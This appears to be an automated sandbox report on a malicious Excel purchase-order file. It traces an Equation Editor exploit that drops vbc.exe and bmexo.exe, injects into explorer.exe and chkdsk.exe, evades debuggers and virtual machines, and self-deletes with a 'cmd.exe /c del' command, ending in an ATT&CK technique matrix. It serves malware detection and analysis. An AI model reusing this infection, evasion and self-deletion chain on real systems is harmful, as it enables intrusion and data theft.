          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$BON DE COMMANDE POUR CHENOUFI AEK.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6595.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@11/16@0/1
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\wxiwy\cojnmd\dyrz\70c437f178a447d5b5e03abf78ad86d5\khqwan\zzevlnko\Release\zzevlnko.pdb source: vbc.exe, 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp, bmexo.exe, 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000005.00000000.968231879.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000006.00000000.974589862.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, chkdsk.exe, 00000008.00000002.1174039918.0000000002887000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173217045.00000000003B3000.00000004.00000020.00020000.00000000.sdmp, nsmD99.tmp.4.dr, bmexo.exe.4.dr
          Source: Binary string: chkdsk.pdb source: bmexo.exe, 00000006.00000002.1050114953.0000000000030000.00000040.10000000.00040000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050401037.0000000000714000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: bmexo.exe, bmexo.exe, 00000006.00000003.981359909.0000000000800000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000003.979000602.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1051582479.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000008.00000002.1173724762.0000000002500000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1050200391.0000000002090000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1051411235.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D01A4 push 28D37A0Fh; iretd
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D0126 push 28D37A0Fh; iretd
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F22445 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_004172EC push DC386EC8h; ret
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040FCF7 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D662 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D66B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D615 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D6CC push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F22445 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000A72EC push DC386EC8h; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD615 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD66B push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD662 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD6CC push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009FCF7 push ebp; ret
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\bmexo.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F21890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeRDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeRDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000098C04 second address: 0000000000098C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000098F9E second address: 0000000000098FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1320Thread sleep time: -480000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00408ED0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004069A4 FindFirstFileW,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
          Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000007.00000000.1002012184.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000e
          Source: explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.987724559.00000000002AF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000007.00000000.1034386831.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 00000007.00000000.989955788.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.1041586211.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: explorer.exe, 00000007.00000000.1002012184.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F27A95 IsDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F2558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F286ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00408ED0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D0591 mov edx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_001603F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_0016061D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_001606F7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00160736 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00160772 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02380080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023800EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040A140 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F2439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F2439B SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 80000
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeMemory written: C:\Users\user\AppData\Local\Temp\bmexo.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeThread register set: target process: 1860
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeThread register set: target process: 1860
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 1860
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"
          Source: explorer.exe, 00000007.00000000.1034648528.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.997360427.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1009986112.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.1034648528.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.1034648528.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.997360427.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1009986112.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F23283 cpuid
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F23EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scripting
          Path Interception1
          Access Token Manipulation
          111
          Masquerading
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts11
          Native API
          Boot or Logon Initialization Scripts512
          Process Injection
          2
          Virtualization/Sandbox Evasion
          LSASS Memory151
          Security Software Discovery
          Remote Desktop Protocol1
          Clipboard Data
          Exfiltration Over Bluetooth33
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules
          Logon Script (Windows)Logon Script (Windows)1
          Access Token Manipulation
          Security Account Manager2
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts22
          Exploitation for Client Execution
          Logon Script (Mac)Logon Script (Mac)512
          Process Injection
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer121
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Scripting
          Cached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items3
